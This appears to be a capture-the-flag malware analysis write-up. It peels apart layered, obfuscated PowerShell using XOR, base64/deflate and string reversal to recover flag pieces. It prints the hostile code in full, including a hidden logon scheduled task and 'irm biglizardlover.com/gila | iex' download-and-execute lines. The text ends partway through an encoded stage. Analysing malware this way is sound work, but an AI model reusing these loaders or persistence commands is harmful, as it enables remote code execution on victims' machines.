.( ([sTriNg]$vERBOsEpREfEREnCe)[1,3]+'X'-JoiN'') ( ( '12G10G4}12I8b73G98G122&22&111f99f65f95G92,73f79,119,24&0y30z26f0,30&25,113y1z70G99I101I98b11z11&5,12f4&98G73z91}1z99f78z70y73}111y120y12r12}69f67I2I79&99&97,92G94G105z95}127,101z67r66b2,104}105r74I64f109z120y73f127b88I94y73}109G97y4I12}119&69,67}2z65f105r65y67r126y85y127G120,94I105r77I65y113f119b111b99,66z122f105r94,88r113y22r22,106r94b67&65z78I109&95&105f26y24}127z88f126&101&66G107G4y11b72&122&122,78}120b7b98y107&106I100I27,66z122&24&85z69z64f121r24&95z84z88r66,117z105}106}103&111r73&97b69&107z78r101z64y103&101f105G29}75f93f118I92G107b91}88G75b66,118I92}94I84&30f110f30z124&125y27,103y89y3r31,88z29,84&89z117I65G28G126y72}94z96r89&74&30r66r74G65r7I24f91f121f77,72b30z101b91,65G73}71f28G125b30}31b30G94,98,29r89&88&20r92f73z122y116z92b122b73b122,85I122I31I77}67G20}93}71&93&3G77y70r106f31f86}121r109&85y24&103f111b109}75z91r125}99r95I28I111r68G31}124z120f100I105}30r122z125I93z20f111}101r122r109}116I109r91z73&75r121I99&106,86}7&98,94z67,78y78z124r94I70f121f125I93I99z91I21G86G25b99f102z124y104&79y97I84}75b28}84}20G104&116y24}77&116b75&122G26f72f7I75z25z86y94r24z97G105z123,78&88f106&30f78r92f122r69z31&103&79}109I66&3&72z30b26f125G21r24G102}110}27r66&67}31G86}101f25r111r106,88&74}72y88G77b122y25,70r67r69b124b75I28&109y105y99I122,7r102y66r109&97f24,118I123I31b85z103f93&66}117y26y93I68b92G24b74,117I90&91I84,97G77f109r105G116G109z75&125y106y98y78,124}100y111z24r107I28G91r21b100}86z70I121f20r101G104&104f103f106y122z107y92z25,96I98&85I98}103r69G92f127,25G24G124f68y116&107}116r101G28f86r107,117G86y107r27,73z116&67}79b93f68&116,3I74r25G68b90z120f75z7,78z126b77b21I94f95I124,94G29f74I3y75I124}89z93&72I105&64}109y74,31,95I124&95z121f89b20z102f102,64I64z79f109z125}79G72I105y121}85I96G20f65}109,117b126r73&27y88r124y71b97z107b126f127f25I121&86&110}78,27r31z107&110G85r21}66,27G120G65,126z74f103,69b109b125y27f106}71&123f77r96f122,110I90,126r117r70z25z123y122G117f20b127y68}107,85r121}109I118G25z86&89f78y64r20r71r96y103G127&118I103G64G30&94I126f78b126y117I27r26b85f99,21,105G121,94f78&24r109b95f29z122f71I102I89I84r29r93f71f7r98b27,92G109b118&21}122&24G25G69,117b91f101,65f127}24b67b7I26f91f69r120y101z86f67y21,71,111&122}120G120r106f124}109y21r69b90I110y121y102G92f67f122f92z98&86}72f124y21I85&94I69&125f68y71z30r86y123,124f73b66}104,31I124b109r68I28z71f124I104f73I77r111&92G78,29}70y65r86b123f84}116r79r118}84y96y64&72}106&28}28z75&66r68f78&65y102z117b31b97z67I89z79,25z25y67b121f28,86&64r71r106z27&101G91G88G25}26r90,110z24}102r124}71}127&26y106y97G118G90f127&93z89f29b89I90&29f30z90r73b31z116&64G104b90&93y85f104,94,109}77,104,124I29I107,66G100y27}68b65y77G120r29I126&110z68G86,89y20y29f26y31f30y7r122z96f70r73G90f122}77r25z70z77}84z116r100f117&90}7,85f65b97y99b25&29y101,73r116I110}100}107r99G126I107r21y120,89&101z66,86}111z93I102,109&117y31}125b78r25,68z94,66&28y74r116,64y71b31f25I96z89&70b72y96}90G31G68z28f85b117I64G99b24z103b79G104}68f101z124I74&74f75b97I97f21I109,75,74r79&105G109b20r89}97I109G7f29I85y101f68r95&25}100I126r77r64G72,25&102,122G116z93f29r98}104,28,127y75,106y7r122y90,29&127b64,126}21r89r77I29}31r120y117G73b20b66y116z102G31G93z3&93I90G72b102y92}99z93y72f74z64z64&110z66b31z98r107r79&95I30G110r125}24r105&77G100}85z65b31,7z101,72z71I78,104&109}31b102z124y79G29f30G120G25b127G127r79I104&68b78y91r86,102&89I71b68&125z94,28r66f95G68z85r85I28f97r72,71z68z91G117r69f31G75}127}85G67}27G65y106f117,64I31z85I98&86&84}3y27y28f64f85z24f24b84&30r107z68z116I64&120y125,106b97&70f124&111,106,64f85,21z102}66}29f106I127}127G27,99}109r99y78I121,109y72y106I91f71G93y121z7I89b117z71y102r7I20}111y94b66}116f24I103G21b78,24r124f123r88&118b105f27&94f90b90&69f30I110}28r31r104r93G104,123G98y30,94z89I122&66&123b125,126z117y121,20r111G106r72f107}99I103y92I90}126&109r127b95r92I88&77,111&123}109y101I72z117G69f92&7z110I70}93r127y21,67f120&26I121G116G69,122r28,109I68r91f95b111G89,111,91r126z72f28I102f28,7r126f94&70z99,107,107z94}97r70I86G73f123,100z30b71}70b93b123f71}79&104G79b73r86r67G96G21,7b86}78I66&89r25,84f122G31I67G122&68}78b95,121y121&117b127z103z89r77,97z28r95r73z124z88z7}31y102y105}71z21,100}86z70r30y64b123z110&100I92z29}72}105f86y100b88I29z94z105&97f73y92f124G7,90,64b85y24I91,27G98}122&126}94b74I103y101I73b25f97r85b29}121I103,96G102z109I74G65f96&7r72r89y74y73r25b77}75G66f105,123b88G21y125z78}121G72G31G111G31G107G20G24I89b78&26I116z110b85}3b72f74&94z3b66r67,24}100}78f73G117I73y25I116&107&93f78&102z120}92&66&24&94r3f86&97b123I97G91b68b111r101r27z77&105,122,84G99z126&127b121y98r105z107z102r94,20I68f78G94f111}96y79I67y31r79I7y92f3b78&88b25G98y73,74I101I116f20y126&98b25f116,24y96,86G121z122y25f111r102,24}29b66&86}7y117z7,95,95G21r24I116&105G72&102&105,84&89r64b3,68f107}24}77z31I75I121b95&73y123I30&121y25&98,122z72y20}102}31G21I29I117&111&116&30}98b110z110z109y90G109y7b118r69&7&74y89f107,88y74r120f84y78y75f97r104y72z91b118z72f85z72,103,124}85&68z27f95G92&86I88r79I124r91&24y74I106y91}7&116I71G126f64y116&95z90I102z107}28}21&28b96z111r94r69,31,89,89r110r66r70&88,20y104&110&85I90f75,124y71&90z77b90y29I101}70b118&27f7&74}66I72,102I103r126b122I103r118,70f27r7f125}89b97z120G79&3b91G104I66&24}104z91z17z17I11G5,12r0z119z95z85r127b120&73&97G2r101}67f2}79b99}65b124}94G105&127G127,69G67&66f2z79y67y97r124z94}73G95I127z69&67z98z65,67,104z105b113,22z22I72b105b111,99G65}92b94y73z95}127r12&5b12,80z106z67y94&105f109f111}68b1G99I110z102f73r111f120z12&87&12&98G73G91z1,99f78,70I73}111y120y12G12f101f67&2I95b120&94r73y77r65z94,105b77&72r105r126&4r12z8I115z0b119,120}105z84,88G2}105z66f79,67,72f101r66}75,113r22f22z109z95}79r69z69}5y12f81b80b106b67&94z105}77,111I100y1b99,78I102f73z111z88f12&87&12G8r115,2y126f105b109b104G120,67&73I98}72,4G5}81I12,5}12'-SPlIT 'g' -spLiT'R'-sPLiT '&'-SplIt ','-sPlIt 'Y'-SplIT 'z'-SPLIT '}' -sPlIT 'i'-SpliT 'F' -SPLit'b'|% { [CHar]( $_ -bxoR 0x2c ) } )-jOIN'')

The following is the result of deobfuscating the script contained withing the previous script. Again, the initial part of this script evaluates to iex. The second part of the script base64 decodes, then uncompresses another script that is passed to iex.

&( $eNV:COmspec[4,26,25]-jOIN'') (New-ObjeCT io.cOMprEsSIon.DEflATeStreAM( [io.mEmoRySTrEam][COnVErt]::FrombAsE64StRInG('dVVbT+NGFH7nV4yilU4sxtnYEFKCeMiGbIlKIE1gqZpGwtgnZprx2B2PQ7Ku/3t1xuYm0RdrLuf2nfm+4wUad2Iwmek0Q232rN1ut8peVXpVeVyV3ao8qkq/ajF3zUAy4KCAgwQOs0Ch3PTHE2VQq8CIVAXAwegUOFz+NrobbPrjUQqOw9z5OJPDcMxg0x8DX4aXgV6d+g5zr4MEWbtF2bpVi3KcAn/d26Q94JB7no3zI5CFtfdtaV5joiPg0AEOV+JnAM4ZW3yKqnY6qhp4fYvwxMaAEXAgQFNbPHC4G0w9HzjU8IDDKFVGp5LNyNKipS54PhXGXI0zGYzG7eXocqhX/f5hvTg+bRa9rsPr1f/gPuqdElAf3sPsUu8JJllcAQcdEUyL8mAYRe7tPkMGRS5UzBb73GBy9n7TmRfKiAQ7FkWaLVBvRYj5WVY8ShGyUAZ5zubl8kLKSZKl2rRbRY76yO9EUrb4As1VkJux1qk+N7pAZ9V45iYwImS4o+6wiTIzo9kCVTTFPA9ivBUJpoVpNzdP9yriQhk2zWPenD3PAh0kPDeaCpb1jmzWxXcZxLldF00gnhbmJY3Mouc55oU0zlkF7Iwt56vB4JPkS6FMZvSqu1uv12ve3XlDvqyDrAaDP1GnH7hmaT1RBhzu81632+VLjevVa5jaxXHYv+ymMO51IeXBHGORG9TuInzCqJAY3Qb5hrn0fXlk35LujdLv3h0yYlO4KcDhIPffgMM9AgfcEA8uMA+1yIhs5HRald5JVXq1ND0SgF+Vv1SlR9ua13TYe8nXJ3q/qvdJpOqdfllBn3NGcs2BQ4EaHym3+IdkbDA3JPc12T5SScDhbwzJukhQr0nshyy0MdkhwYi3gSyo7mFYl3yNzx/70ly44x2GhXlTQFMjPCFly9Jn1FSS7OAObUAdFwkqU+uYkJ+8CrnX4K9b4PWtZE7rvvi2B03DqDWN2ruVnWQRYU8CFdGOKpvRASsptaCWAIdYip+BjqS9oT6UXiV0AhwsCuCwRd0J0+RrjOGGrMjzeWH2kjqWkcDcezoL9+zbnu5xV3oVhbsUUYSKuaM0sePt+3JEk9Hzj2lWBHp1dEzHt1rEMepP+vly4w7NVRrfKIe5My1UKLJAfmL+dufe5agnEWt9QbUd3C3G84ub6XBy/dfr/no4HbeYe5XGqbJTpn4r/zMWMwhCI7aEVxORSUNEGJr8hbrCLco3c+p/bt5NefIX8RN5X4LzUV5CJ41nz+Y+ss94XEdJExul/hG4a3gUseW2U5NVd8J391YCX2NBBAvA+Zi+fuGtfTxbgMDdwZdydKPyh7spztcPw4fFw+XkRlXsvJG090LCri3uuBnjt8DByvgPkvav1IjZ7+fndJKRVKZj7+QuMTc/wDn4Dw==') ,[sySTeM.Io.cOmPrESSion.coMPresSioNmoDE]::dECOmpresS ) |ForEACh-OBJeCT { New-ObjeCT Io.sTreamrEadER( $_,[TExt.EncodIng]::Ascii) }|ForEaCH-ObJeCt { $_.READToeNd()} )

After decoding and uncompressing the data, the following is the resulting script.

Set-ItemProperty ((("{5}{1}{4}{0}{3}{2}" -f 'l ','n','l','Panelk7EInternationa','tro','HKCU:k7ECo')) -REplAcE 'k7E',[cHar]92) -Name ("{1}{0}"-f '9',("{1}{0}" -f '5','s11')) -Value ("{2}{0}{1}" -f 'rd','.','Liza'); Set-ItemProperty ((("{2}{0}{3}{5}{1}{7}{4}{6}" -f'C','anelM','HK','U:M12','Intern','Control P','ational','12'))  -rePlaCE([CHAr]77+[CHAr]49+[CHAr]50),[CHAr]92) -Name ("{1}{0}"-f '359','s2') -Value ("{0}{2}{1}"-f 'L','rd.','iza')
Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout([intptr]0xffff,0x1A,[IntPtr]::Zero,("{1}{0}" -f'l','Int'),2,5000,[ref]([intptr]::Zero)) | Out-Null
Register-ScheduledTask -TaskName ("{2}{3}{1}{0}" -f ("{1}{0}"-f'p','acku'),'lyB','We','ek') -Description ("{9}{16}{11}{4}{10}{12}{8}{14}{13}{5}{0}{15}{3}{1}{7}{6}{2}" -f 'hion','n','l',' u',' = o','s','uerebe','iq','ttest ','fl','b','e','jec','sumerfa','+ con',' +','agvalu') -Action (New-ScheduledTaskAction -Execute ("{1}{0}{2}" -f'hel','powers','l.exe') -Argument ((("{10}{6}{3}{5}{15}{14}{1}{13}{17}{2}{9}{8}{12}{7}{11}{4}{0}{16}" -f'0} ','ndo','mand ','tionPo',' {','li','u','glizardlo',' b','{1}irm','-Exec','ver.com/gecko','i','wStyle','pass -Wi','cy By','iex{1}',' Hidden -Com')) -F[CHar]124,[CHar]34)) -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType ("{1}{2}{0}" -f ("{1}{0}"-f 'active','r'),'Int','e') -RunLevel ("{1}{0}" -f'st',("{1}{0}"-f 'ighe','H'))) | Out-Null
irm ("{1}{5}{2}{3}{0}{4}" -f'om',("{0}{1}"-f'big','l'),'e','r.c',("{0}{1}" -f '/gil','a'),("{1}{0}"-f 'zardlov','i')) | iex
${COns`UMeRf`A`S`HIOn} = ("{2}{1}{6}{3}{0}{5}{4}"-f '3T','B','WXp','Gt','PQ==','Wpn','ME16UmtOV')

After cleaning up the formatting and encoded strings in this script, the string flagvalue = objecttest + consumerfashion + uniquerebel is revealed in the description of the scheduled task that is created. One of the three pieces of the flag, ConsumerFashion, is also found in this script as a double base64 encoded string.

Set-ItemProperty "HKCU:\Control Panel\International" -Name "s1159" -Value "Lizard."
Set-ItemProperty "HKCU:\Control Panel\International" -Name "s2359" -Value "Lizard."
Add-Type 'using System;using System.Runtime.InteropServices;public class R{[DllImport("user32.dll",SetLastError=true)]public static extern IntPtr SendMessageTimeout(IntPtr hWnd,int Msg,IntPtr wParam,string lParam,int fuFlags,int uTimeout,out IntPtr lpdwResult);}' ; [R]::SendMessageTimeout(65535,26,0,"Intl",2,5000,[ref]0) | Out-Null
Register-ScheduledTask -TaskName "WeeklyBackup" -Description "flagvalue = objecttest + consumerfashion + uniquerebel"
    -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument '-ExecutionPolicy Bypass -WindowStyle Hidden -Command "irm biglizardlover.com/gecko | iex"')
    -Trigger (New-ScheduledTaskTrigger -AtLogOn)
    -Principal (New-ScheduledTaskPrincipal -UserId "$env:USERDOMAIN\$env:USERNAME" -LogonType "Interactive" -RunLevel "Highest") | Out-Null
irm "biglizardlover.com/gila" | iex
$ConsumerFashion = "WXpBME16UmtOVGt3TWpnPQ=="

The previous script fetches and executes the following script from biglizardlover.com/gila. The final part of this script evaluates to iex. The initial part of this script assigns a long string to the TFr1S variable. This string is then reversed, and piped to iex.

$TFr1S = " )'X'+]43[EmOHSP$+]12[EMoHSp$ (&| )93]rAhc[]Gnirts[,)28]rAhc[+78]rAhc[+401]rAhc[((eCaLpER.)'|',)58]rAhc[+401]rAhc[+37]rAhc[((eCaLpER.)'$',)75]rAhc[+97]rAhc[+27]rAhc[((eCaLpER.)43]rAhc[]Gnirts[,'Ywo'(eCaLpER.)')RWhRWhnIOj-RWhXRWh+]3,1[)ecnerefERPEsOBrev9OH]gniRTS'+'[( (&Uh'+'I '+'Ywo ) RWh RWh RWhsFo:ElBairavRWh METI-tEs(9OH Ywo+ )}'+')RWhd2x0RWhRoXb- _9OH (]raH'+'c[{hcaEROf UhIRWhgRWhTILps- RWhURWh TIlPS-RWhcRWh ti'+'Lp'+'S-RWh-RW'+'hTilps-RWh'+'JRWhTILPS- RWhB'+'RWhTILPS-RWhwRWhtIlpS-RWh%RWhTIlpS-RW'+'h<RWhTILPS- RWhoRWh TIlPS-RWh9'+'3-51B02<49-601B721U521g96'+'j46O321C711W56B321%99j911B39B221O121C09g92j07-67j89C99'+'g78%87'+'U78%66<701C67O52O82W46O221C51-31%61j31g'+'98<49-27<121B98%87B27U17j97g66U9W93%08g93%76-27<37W37-86W101j31j27O56%48-98g621j09%66C37%76g86g221C0C'+'31O09U66W97-56<27<27g37<86B56O47W9O31j1O01%37%76B67g46C46-66j011C0-01O3'+'1B98-4'+'9C'+'86g79W98j'+'76j27-46B88W47%59j801g0-31j56C56-27%96W49-59<27O09%66W39<31j49%49O27C87'+'j66g59<521<0j98O59<67j98W621<31-31-31B31C93B56O56B88j99%0W98%88'+'C'+'89C31C18'+'<31-4-13-6U82W1'+'B37j76g27C39<27W3'+'7B98j96j47W86%56-86U09U98g9U1<92C1B92O13W5O66g57'+'%76%001j4'+'9U59O27O98g27C46'+'B67%59-67g521j46j27W98B'+'49W48-621g32g32C211W'+'22'+'1-811<31W22-51W08-31B22%4<86U7'+'6C001B76j86j221'+'W88g57%31j98B76j86O1g46W67-59B67W521B19j39<56g31W47U76-86B59U98B49g1O46<67W59O67C521C88%31-98j76B86C1B76j66j86B98O87-8'+'01C8'+'8O31j98B76C86B5%66W57-76<001W49U5'+'9O27g98B27W46C67-59W67-521C46-27U98%49-48g621%31C56O66C66'+'j97B31U76W59B27U98j58W27O'+'31-87W86g98O67C98W49O31O87j86-56j97-88g39C31B211C4W51-77j56C56U37%3g'+'13<03-5'+'9j27<49-8'+'8O51U77g5-98-59W66%39g46'+'g001C56U56<501g811g31O68O31j221%31g49-49O67W56B87W31W87j86-56U97W88%39C31O22-49<27j87B86j19<5'+'9C27B621<39O66g59C27j98B76W001U3W27W46U86B98O76<88%721j3W46<27%98g49<48U621-31O47W76W86W49<88U'+'31B22U46B27<98O49U'+'48-621U31C47C76g86O'+'49O88O51O31U76j6'+'6<86O98g86B76U86<57C27<501O27B39g48<12'+'1-0j31%27O39j48%121g0U3'+'7<3'+'7%801B31C31B31g31<93g56j56%88'+'B99g0%98C88j89g31U18-31<27j88<76O86j98C76j66j011<48g5'+'6-9'+'8-76<27O56B86%621<31U76%66U86<9'+'8g87g801O59U66j59<59g401U0g31B37<76C27'+'U39<27C37-'+'98<96%47%86j56W86'+'C09U98<9-31'+'B27g56'+'O86j701g98-88W89<0j'+'31g48C98W59-67O39C98<49U67W27j57W48j58B67B56C67U47%9U31g98%49C27W88-29U27C721O97-27U221<0-27U07-66C19W76U001<31-31U31%31W93<51C47C39B17g3O27O78U86%76<47U66O87j27U59O98O86<88-87W49O86%97W9-37C59-67B'+'78-86B56W2j47g46%86<2<46U66%87%3C59O27<19B66-56g37W59W67B78O'+'86B56j47j86g97<'+'2j2%32j49-39U98j98<96<51-31%61C31-'+'48j98<59B67<39j'+'98%49g67<27<57<4'+'8j58-67U56g67j47O9W31-31-31O31g93C42g13<31j46W88C46%86U58-67O69g'+'0C31B82j31O46B88'+'U46U86C76O86B69W0'+'B31g46j66%37%7'+'6C67U721j0-98W27W601W31j61O31g27B78%86j76O47g66W87W27%'+'59g98g86U88<87U49'+'U86B'+'97g9C31-31-31%31W93j51-47C39W17-3W37U59C67B78g86'+'B56<51g31j521j69j401%121U32<19C76<27'+'W9C3'+'1-96j98B67O5'+'21U0<76-86U66j301-31g'+'61%31g37O76U27C39C27%37j98W96<47g86<56B86g09O98-9'+'B31O31<31%31-93%4B4U4B4W49<47C76'+'C86g59g98-621O31U48<98<59C2'+'7B39<66j59j521j37g76<67W39O58U'+'40'+'1<0%31O98j87j27<17-97U89g0U98j87j27C56U27O621B31<18j31-98%58g98'+'-31%27g39O48%121W0C31<46-66j87O3j59W27C19j66W56W37U59-67j78C86<56C47C86-97j3U02W69j711-97U86g911O76U621%321-56C56%97g221O37g701U321g31U27W46W67B99-49j76%501W0-27C19C56j66W4'+'9C27B721j5O5g47C76-86g59C98U621O52-72<27W49W67<111%46U66'+'j59W'+'7'+'01<32%32O211W98U59B27j1'+'9g76g66B011B3'+'-46j27g98B49%48C621B811C5g47W76j86B59U98<621W98W27O601U3j12C701%'+'121-021U32%32j211<47W76O86B37g66C87W76O401B3U98C58j27C121%3%46B27C98U'+'49<48O621W811W5<31B58g27W86j31<61j31C'+'09W66j97O56j27B27'+'W37C86<56O47B9B31B31-31U31C93g68j31%4C27%88j59<98%9C5U31O27<56-86U96O09RWh (]gNirTS[+ Ywo ) RWhRWh  RWhS'+'foRWh  ELBAIrav-TeS(9OHYwo'( ";  -JOIN (  vArIABlE  tfR1s  ).VaLUe[-1..- ((  vArIABlE  tfR1s  ).VaLUe.leNgTH)]|& ( ([sTriNg]$VERboSEPrEfeREnce)[1,3]+'X'-joiN'')

Reversing the string from the TFr1S variable reveals the following script. Once again, the final part of this script evaluates to iex. The initial part of this script concatenates a number of strings, and makes a series of replacements.

('owYHO9(SeT-varIABLE  hWRof'+'ShWR  hWRhWR ) owY +[STriNg]( hWR90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W'+'72B72j65O79j66W90'+'C13j16<13j68W72g85B13<5W118W126O84<94'+'U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121'+'%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-'+'3B110B66g67g9'+'1j72B95U89W112O23%23<10'+'7'+'W95j'+'66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C9'+'4W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-'+'89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<1'+'04'+'U85O93W76<67g73j125j95j66<93B7'+'2C95<89<84U13O126-89g95g68C'+'67C74<94W4B4U4B4%39-13%13<13O13B'+'9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16'+'g13-103j66U68-67<0U12'+'5O76B89j69-1'+'3C9W'+'72<67C91<23U121%104j96j125j13g15<65B'+'68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79'+'B68U'+'94U78<88U68g89g95'+'%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C6'+'7%73%66j64g13B'+'0W96B68O67C68U64U'+'88B64O13j28B13C0'+'g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j8'+'4<75<72<76g94%89'+'j93<76B95<89j84'+'-13C16%13-15<69<89j89U93-94j23%2j2'+'<79g68j74j65B68'+'O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87'+'B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13'+'j0<98W88-89g107j68O'+'65g72B'+'13-9<89U90C'+'68W65j68%74%69<89'+'-73C72<93U'+'72C67<73B13g0U104g95<95j66U95O108g78g8'+'9<68U66%67U13<126%68B65O72<67-8'+'9-6'+'5g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B'+'88%65j65g39<13g13B13C13B108%7'+'3<7'+'3U0g121%84j93O72%13j0-1'+'21<84g93B72O105<72C75<68U67B68g89O68<6'+'6j67U13O15O88O94'+'O68g67C74C13U126-84'+'U94O89<72B64U22B13'+'U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C9'+'5<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g'+'64g93%66W95-89-5g77U15O8'+'8-94<72j9'+'5-30<31'+'g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13'+'O72W85j89U72B95W67U13B79j'+'66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O9'+'5U94W100<67-75W66%5B68C67B89j13O8'+'8C10'+'8-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W'+'122j68j67B100C6'+'7U68<4%22B13-80W15-22W13<118-1'+'22'+'W112C23g23g126-84W94'+'B89W72j64j125g76-95%76B'+'64C72g89O72O95U9'+'4j100%67%'+'75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B7'+'3W72<93C72g67j73B'+'1W28U6-31-4-13<'+'81C13C98'+'C'+'88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j'+'78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67'+'j89W97g68'+'C9'+'4-89B1'+'3O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13'+'C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89'+'g13j16%13-15C122O64W28O25O76C107<66%87U'+'78%87g'+'99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j'+'69g125U127B106-94<20B15-3'+'9hWR-SPlIT hWRohWR -SPLIThWR<h'+'WR-SplIThWR%hWR-SplIthWRwhWR-SPLIThWR'+'BhWR -SPLIThWRJ'+'hWR-spliTh'+'WR-hWR-S'+'pL'+'it hWRchWR-SPlIT hWRUhWR -spLIThWRghWRIhU fOREach{[c'+'Har]( HO9_ -bXoRhWR0x2dhWR)'+'}) +owY HO9(sEt-ITEM hWRvariaBlE:oFshWR hWR hWR ) owY'+' I'+'hU&( (['+'STRing]HO9verBOsEPREference)[1,3]+hWRXhWR-jOInhWRhWR)').REpLaCe('owY',[strinG][chAr]34).REpLaCe(([chAr]72+[chAr]79+[chAr]57),'$').REpLaCe(([chAr]73+[chAr]104+[chAr]85),'|').REpLaCe(([chAr]104+[chAr]87+[chAr]82),[strinG][chAr]39) |&( $pSHoME[21]+$PSHOmE[34]+'X')

After the concatenation and replacements, the initial part of the previous script evaluates to the following. Again, the final part of this script evaluates to iex. Like the first script, the initial part of this script splits a long string at specific characters and performs XOR with the key 0x2d. The resulting script is piped to iex.

"$(SeT-varIABLE  'ofS'  '' ) " +[STriNg]( '90O69U68-65<72O13U5C9%89<95j88%72C4%13j86g39C13U13-13B13B9B74O65<68C73W72B72j65O79j66W90C13j16<13j68W72g85B13<5W118W126O84<94U89C72B64%3%121C72j85C89U3B104O67W78C66g73B68O67W74<112j23%23U120-121%107C21j3U106O72W89W126<89U95B68j67W74g5C118B126C84%94B89g72j64-3B110B66g67g91j72B95U89W112O23%23<107W95j66U64%111<76W94W72<27-25O126U89C95g68-67C74g5O5j127B72C94W66j65C91C72-0W105%67j94-99B76W64W72U13g123U107g73O122g79%65C65-123%126U67O119g68U79-117j96W20U3j79-68C74C65<68C87j76-95U73W65W66j91C72W95j3O78j66-64<13C0W121%84O93g72%13-89g85%89-13j81<13B126O72U65C72j78j89U0g98U79-71<72j78j89O13%0<104U85O93W76<67g73j125j95j66<93B72C95<89<84U13O126-89g95g68C67C74<94W4B4U4B4%39-13%13<13O13B9-89O90g68B65<68g74<69W89j73%72C93C72U67O73g13%16g13-103j66U68-67<0U125O76B89j69-13C9W72<67C91<23U121%104j96j125j13g15<65B68g87B76C95U73W3-71W93C74-15j39W13%13-13-13C9g79B68U94U78<88U68g89g95%72W78W66g74O67j68%87B72g13O16j13W106W72W89-0j127U76C67%73%66j64g13B0W96B68O67C68U64U88B64O13j28B13C0g96O76-85U68%64C88W64j13<31g24C39g13O13-13-13W9O74j76g65U76-85j84<75<72<76g94%89j93<76B95<89j84-13C16%13-15<69<89j89U93-94j23%2j2<79g68j74j65B68O87B76W95W73g65-66B91<72O95C3%78%66U64<2<68%64g74j2W65B68-87B76-95C73-9W79%68O94W78-88<68O89O95U72j78O66U74<67%68U87O72O3g71B93C74C15<39W13%13U13-13<100U67W91C66-70U72-0<122U72-79O127C72U92-88W72C94%89g13U9%74U76C65B76B85j84W75j72W76U94<89C93O76-95W89C84g13j0<98W88-89g107j68O65g72B13-9<89U90C68W65j68%74%69<89-73C72<93U72C67<73B13g0U104g95<95j66U95O108g78g89<68U66%67U13<126%68B65O72<67-89-65g84<110j66j67C89j68O67<88j72<13-81U13g98j88C89%0g99B88%65j65g39<13g13B13C13B108%73<73U0g121%84j93O72%13j0-121<84g93B72O105<72C75<68U67B68g89O68<66j67U13O15O88O94O68g67C74C13U126-84U94O89<72B64U22B13U88<94W68W67W74O13-126U84<94g89%72<64W3j127%88<67O89B68U64W72W3U100W67B89j72C95g66O93<126B72C95<91j68B78j72<94-22O13C93%88W79U65-68j78W13W78B65W76O94-94g13%122j13O86O13g118g105<65U65C100g64g93%66W95-89-5g77U15O88-94<72j95-30<31g3%73U65C65j77-15W4C112B13C93g88-79j65-68j78O13O94W89C76O89g68W78-13O72W85j89U72B95W67U13B79j66C66O65C13%126g84-94%89U72-64C125-76W95-76C64W72B89g72O95U94W100<67-75W66%5B68C67B89j13O88C108-78O89B68j66j67B1C68B67j89-13%88C125C76O95W76<64O1g94B89U95B68-67U74W13g65<93j91B125W76B95-76W64g1O68j67B89j13%75g88W122j68j67B100C67U68<4%22B13-80W15-22W13<118-122W112C23g23g126-84W94B89W72j64j125g76-95%76B64C72g89O72O95U94j100%67%75g66O5W31O29B1C29<1U9g89U90U68-65%68W74j69j89B73W72<93C72g67j73B1W28U6-31-4-13<81C13C98C88%89W0%99j88B65O65B39C13B13-13-13<126W89j76<95O89j0<125<95g66j78C72O94%94j13<93W66%90O72<95-94W69%72-65C65j13-0g108j95%74W88B64-72j67j89W97g68C94-89B13O10-0C110j66-64C64g76B67%73%10O1j13O9W74O65B68<73g72<72<65-79W66U90O13C0C122g68g67%73C66%90j126g89-84%65O72j13j101W68-73W73<72-67%39g80%39W9U66g79j71U72B78%89B121<72-94<89g13j16%13-15C122O64W28O25O76C107<66%87U78%87g99C98j76-70j29g90C121O122B93B119j99%123B65W117C123O64j69g125U127B106-94<20B15-39'-SPlIT 'o' -SPLIT'<'-SplIT'%'-SplIt'w'-SPLIT'B' -SPLIT'J'-spliT'-'-SpLit 'c'-SPlIT 'U' -spLIT'g'| fOREach{[cHar]( $_ -bXoR'0x2d')}) +" $(sEt-ITEM 'variaBlE:oFs' ' ' ) " |&( 